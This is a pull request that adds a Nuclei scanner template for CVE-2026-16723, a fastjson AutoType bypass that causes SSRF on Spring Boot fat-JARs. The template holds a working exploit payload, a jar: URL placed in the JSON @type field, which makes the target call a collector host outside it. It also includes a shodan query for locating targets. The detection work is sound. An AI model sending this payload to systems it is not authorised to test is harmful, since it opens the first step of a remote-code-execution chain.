### PR TITLE
Add CVE-2026-16723 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-16723.yaml
+++ b/http/cves/2026/CVE-2026-16723.yaml
@@ -1,0 +1,57 @@
+id: CVE-2026-16723
+
+info:
+  name: fastjson 1.2.68-1.2.83 - AutoType Restriction Bypass Resource-Probing SSRF (Spring Boot Fat-JAR)
+  author: str4k3r
+  severity: critical
+  description: |
+    fastjson 1.2.68 through 1.2.83 fails to reject `@type` values containing
+    URL-special characters (`:`, `!`) before passing them into
+    ParserConfig#checkAutoType's resource-probing fallback, which builds a
+    resource name from the attacker-controlled type name and calls
+    ClassLoader#getResourceAsStream on it. When the application's class
+    loader is a URLClassLoader (the case for a Spring Boot executable
+    fat-JAR launched via `java -jar`), an absolute `http://` type name
+    causes the JVM to issue a genuine outbound HTTP request to the
+    attacker-controlled host, confirming the AutoType bypass and the
+    resource-probing step of the documented RCE chain. Fixed in 1.2.84,
+    which rejects any `@type` value containing `:` or `!` before it ever
+    reaches the class loader (TypeUtils#hasIllegalTypeNameChars). This
+    template requires an operator-supplied HTTP collector reachable from
+    the target (set via `-var collector_url=...`); it does not depend on
+    a public interactsh server, matching the self-hosted-collector pattern
+    used when interactsh is unavailable or undesired.
+  reference:
+    - https://github.com/alibaba/fastjson2/wiki/Security-Advisory:-Remote-Code-Execution-in-fastjson-1.2.68%E2%80%931.2.83
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-16723
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.0
+    cve-id: CVE-2026-16723
+    cwe-id: CWE-502
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: http.component:"Spring"
+  tags: cve,cve2026,fastjson,rce,deserialization,java,spring
+
+variables:
+  token: "{{randstr}}"
+  collector_url: "http://change-me.invalid:8000"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/parse"
+    headers:
+      Content-Type: application/json
+    body: '{"@type":"jar:{{collector_url}}/{{token}}!/Foo"}'
+
+  - method: GET
+    path:
+      - "{{collector_url}}/check?token={{token}}"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "HIT"


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-16723. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.